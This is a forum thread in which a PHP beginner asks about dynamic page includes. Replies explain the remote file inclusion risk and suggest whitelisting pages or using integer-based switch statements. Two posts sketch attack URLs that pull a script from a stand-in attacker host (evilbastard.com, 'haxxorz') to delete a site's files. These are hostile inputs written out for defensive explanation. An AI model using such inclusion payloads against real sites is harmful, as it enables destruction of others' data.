PHP Includes

I include the variable portion of my site, and have the static portions remain. I only use one .PHP. A while back, someone on some forum said my code was inefficent, but didn't explain why. I'm rebuiling my site, and would like to see how I could soup it up. This is my current code.

Ok, well first off you don't need to use $HTTP_GET_VARS anymore, unless you are using a really old version of PHP, you can just use $_GET[variable].
Second, what he probably meant was it showed too much information about your pages. Like exactly where they were placed at. Now if you wanted to you could use Apache's mod_rewrite function. Lots of websites are using this now to hide their full urls from their users. For example, Ozzu does it.
But you can have something like http://www.yoursite.com/content/pagename
You can look here: http://www.ozzu.com/programming-forum/quick-tip-mod-rewrite-t23460.html for a detailed explanation on how to setup your rewirte design.

I can't remember how to exploit it offhand, but you should NEVER do anything with an include that is based on user input unless you validate it first - it opens you up to easy hacing.

All I use are links so I think I should be safe.

What would be the advantage of the rewrite dealie? It seems like it would just change what the links look like, the code I use would be the same.

just because you are only using links doesn't make it safe. You are at just as much risk. What's stopping people from changing the URL?

As I recall, the exploit goes <i>something</i> along the lines of typing in:

http://www.yourdomain.com/?http://www.e ... m/wipe_hdd

which goes and gets wipe_hdd.inc (by http) from evilbastard.com and then happily runs any php code in that file. In this case, a nice little script that deletes all the files on your website. I'm not sure if that is 100% correct. There are a hell of a lot of exploits like this, and I have never used them, I just learned the techniques to guard against them.

In your situation, the simplist way of doing it would be to do a variation on the following:


This will check to see if the file is allowed as defined by that array. You can also set elements to 0 to temporarily disable a page, without having to delete it. Just a handy extra thing I thought up.

This is one of the reasons that I don't use dynamic include statements.

I rather create seperate functions with strong exception handling.

Always remember to test user input, I find passing an integer rather than a string works nicely (makes it difficult to guess), check whether the value is an int, make your selection in a case statement and have a dfeault case to fail on any anomilies.

Whats nice about this is that you can set constants to have a more discriptive Name ie


and in your select statement

(not sure if the syntax is right but you get the idea)
Anyways that's just me

For the rewrite thing then, couldn't they type in indexhttp://www.haxxorz/malscript.php, or does that not work/ assumes that they know exactly how the rewrite works and wouldn't usually happen?

As for the allowed pages thing, all I would have to do is add the include to the list, then paste that if statement above the includes, then after the includes have an else statement that loads an omg haxxor page or something?

Sorry, I know little of php, I pretty much just copied my include statement off a tutorial, though I did write the elseif by myself. I was so happy when I finally got the statement right, I tried to guess the right word for a half hour or so before I finally tried elseif.